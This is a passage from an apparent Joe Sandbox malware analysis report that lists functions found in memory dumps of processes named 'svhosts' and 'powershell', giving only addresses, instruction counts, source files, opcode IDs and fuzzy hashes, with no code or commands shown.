                                  • Opcode Fuzzy Hash: 757f041315b6c3d7028389e85d073130818edd226ff033e792cb0c0fd40d88d8
                                  • Instruction Fuzzy Hash: 2932E771B2EB895FEBB5DB5884657A6B7D1EF99300F05847EC08CC32A2DE34A906C741
                                  Function 00007FFD9BA1E7BD Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: [5_^
                                  • API String ID: 0-2920828332
                                  • Opcode ID: 265335c830ffcd029a00ff0103408fb729b886af3328141a9a2f89e61022f427
                                  • Instruction ID: 02821102965f93eba5be9c4b24450daea712d229d948047125f75d3ddc89eff1
                                  • Opcode Fuzzy Hash: 265335c830ffcd029a00ff0103408fb729b886af3328141a9a2f89e61022f427
                                  • Instruction Fuzzy Hash: CB41294290F2D60BF6A667B43C394E56F80FF01A6470D95F7C0E94B0E7AC886A564356
                                  Function 00007FFD9B9656F1 Relevance: .7, Instructions: 659COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2300823004.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9b960000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3f1515a87553e0248011725b0d3bc6d2f85b8035f7db4757fdefd1e96b85c8e
                                  • Instruction ID: 8226b46f893ff3b68ad24af0fae50bfd64803d5898cd1e84b63e52925cd83e20
                                  • Opcode Fuzzy Hash: a3f1515a87553e0248011725b0d3bc6d2f85b8035f7db4757fdefd1e96b85c8e
                                  • Instruction Fuzzy Hash: 68126D01B3EA4F6BF3B156DC48BA37516C1AF58B00F16817AE04DCB6F7DC49AE054282
                                  Function 00007FFD9BA15F80 Relevance: .4, Instructions: 380COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b121facdabd1fc33d88893633140d71b7d2901bd43c09b6f0c650d0077226bb
                                  • Instruction ID: 51afab9a10354522a201aba12490bca33ad90c0357ca6c31f5b18feb98c026b8
                                  • Opcode Fuzzy Hash: 3b121facdabd1fc33d88893633140d71b7d2901bd43c09b6f0c650d0077226bb
                                  • Instruction Fuzzy Hash: BEC1E9A2A0817286E35EB7BCFD7A9E53750DF0122CB0886B7D0EE8B0D7FD5850876185
                                  Function 00007FFD9BA1DD65 Relevance: .4, Instructions: 361COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 067a54c3193d3ffd5e24288ae31c23c1979d74d3fd4bd87a3c1a0564d8849fe2
                                  • Instruction ID: c9fa256f5eb89199f6faf071502932fcb3938a446caefff6cffa91bae5450335
                                  • Opcode Fuzzy Hash: 067a54c3193d3ffd5e24288ae31c23c1979d74d3fd4bd87a3c1a0564d8849fe2
                                  • Instruction Fuzzy Hash: 9BB16F6166E9CA1FD79AE76448B19B2BBA1EF62350B0441FAD0DDC30E7ED187907C342
                                  Function 00007FFD9BA1DD90 Relevance: .4, Instructions: 354COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7af88896669be52f5e664c69f743c93408f67fd2f8346ea8d661fe2139fff4a4
                                  • Instruction ID: c902956324a25dfebbb436d616124538256131f883ea7307f2354ffc6fa90267
                                  • Opcode Fuzzy Hash: 7af88896669be52f5e664c69f743c93408f67fd2f8346ea8d661fe2139fff4a4
                                  • Instruction Fuzzy Hash: 55C17C5166EAC60FD39AE76448B19B27BA1EF62310B0941FAD0DEC30E7ED187906C342
                                  Function 00007FFD9BA15FD8 Relevance: .4, Instructions: 350COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5cf669ad79935e4b7dbd6f766b9ccd87efdcabeef848c01c0f9fbb0f4004e4db
                                  • Instruction ID: c07871baefe1370284268c252fbe1383dc045cb1b33aca11817fa8b3d06e6376
                                  • Opcode Fuzzy Hash: 5cf669ad79935e4b7dbd6f766b9ccd87efdcabeef848c01c0f9fbb0f4004e4db
                                  • Instruction Fuzzy Hash: 59B1EAA2A181728AE35EB7BCFD7A8D53750DF4132CB0886B7D0AE8B0D7FD5850876185
                                  Function 00007FFD9BA1E648 Relevance: .3, Instructions: 308COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1d1b1c90f06deaaa5fbbec1ff9a5347938ffd8667c3dbfd2e189e477a7ae490b
                                  • Instruction ID: 58effb7d584cdc392dc40faef8e5982bc3c02e970c2a205b7fed0e538e2dafbc
                                  • Opcode Fuzzy Hash: 1d1b1c90f06deaaa5fbbec1ff9a5347938ffd8667c3dbfd2e189e477a7ae490b
                                  • Instruction Fuzzy Hash: FF817B21F4EA4E0FEB789B6C986157977D1EFA4350B0501BBE01DC72D7EE68AD028381
                                  Function 00007FFD9BA1E7C0 Relevance: .3, Instructions: 285COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 66ac948e7232d9faa5dfc1f9ef1acfe6120c79e3e475a83e082667759065b8ba
                                  • Instruction ID: 68995a5eb7b00fbd681bef885e60e5389d9eda392b84576c08bbd124cd6c8ece
                                  • Opcode Fuzzy Hash: 66ac948e7232d9faa5dfc1f9ef1acfe6120c79e3e475a83e082667759065b8ba
                                  • Instruction Fuzzy Hash: 6C818931A0DA4C8FE738DB9898556B977E0FB55320F12027ED54EC31B5DE74B9418782
                                  Function 00007FFD9BA169D3 Relevance: .3, Instructions: 265COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14f3f001e37bf0ae02179daeea40e2481dd31387b9a6681e67aaad6016f06da7
                                  • Instruction ID: 25776be9ed91b83208311cc23dfb37a3fbce30d147e4f05ea3d52f6f3dca9ba6
                                  • Opcode Fuzzy Hash: 14f3f001e37bf0ae02179daeea40e2481dd31387b9a6681e67aaad6016f06da7
                                  • Instruction Fuzzy Hash: 5291A8B6A191718AE34EB7B8BD7A8D53750DF0122C70885F7D0BE8B0D7FD5CA0426199
                                  Function 00007FFD9BA39548 Relevance: .2, Instructions: 161COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f4befe23f44c640a6b86b9bfd50ce9ac461f2d3fbf532b2b582c4c61690d5999
                                  • Instruction ID: 4410af799bf7b3eeee0cb0c3f590b30cf731d557a317bd7b6d5d8bb5cb52ab9d
                                  • Opcode Fuzzy Hash: f4befe23f44c640a6b86b9bfd50ce9ac461f2d3fbf532b2b582c4c61690d5999
                                  • Instruction Fuzzy Hash: B451496291D75A9EE315FBB8E8AA8D57B60EF0031CB0802B7D1E94B0D3FE547106D784
                                  Function 00007FFD9BA19C63 Relevance: .1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 28c280a35ef87e262287710f0474824c77963fa94c391161bc5870067e641083
                                  • Instruction ID: 342bceaf922af29314b4bb788d36c9dba153885a4cbdb3bcbccf64c9495f651a
                                  • Opcode Fuzzy Hash: 28c280a35ef87e262287710f0474824c77963fa94c391161bc5870067e641083
                                  • Instruction Fuzzy Hash: 72411AA392817685E70D7BFC79699E93310DF8022CB084AB3D5FE4B087AD587093A6D5
                                  Function 00007FFD9BA1AC35 Relevance: .1, Instructions: 88COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2305699817.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9ba10000_svhosts.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1ddbacebb49ec74b88e54935148b579276933c5da2357abb74aced4181489fd9
                                  • Instruction ID: a002dda6895fb468c111dff14ed2484bb0c7f7c9b83b5c768b72026f2cd09950
                                  • Opcode Fuzzy Hash: 1ddbacebb49ec74b88e54935148b579276933c5da2357abb74aced4181489fd9
                                  • Instruction Fuzzy Hash: 9D212CB2918136C5E749BBF4B996CEA7310DF4072CB0909B3D17E8B0E3EA58B14155D4

                                  Executed Functions

                                  Function 00007FFD9B952C95 Relevance: .4, Instructions: 432COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2415608511.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd9b950000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1f5647777b630cbf1f4bceb8c96270a3ef099b9714bae1bd8dd123f2132f3da
                                  • Instruction ID: 4ad3db44e922245786c71976b4c76a74aeacfe53318940e797f5e2333f698847
                                  • Opcode Fuzzy Hash: b1f5647777b630cbf1f4bceb8c96270a3ef099b9714bae1bd8dd123f2132f3da
                                  • Instruction Fuzzy Hash: C0D17572B2EA8D1FE7A997E888656B57BD1EF16304F1900FED84DC70E3DA58A8058341
                                  Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2414459957.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd9b880000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                  • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                  • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41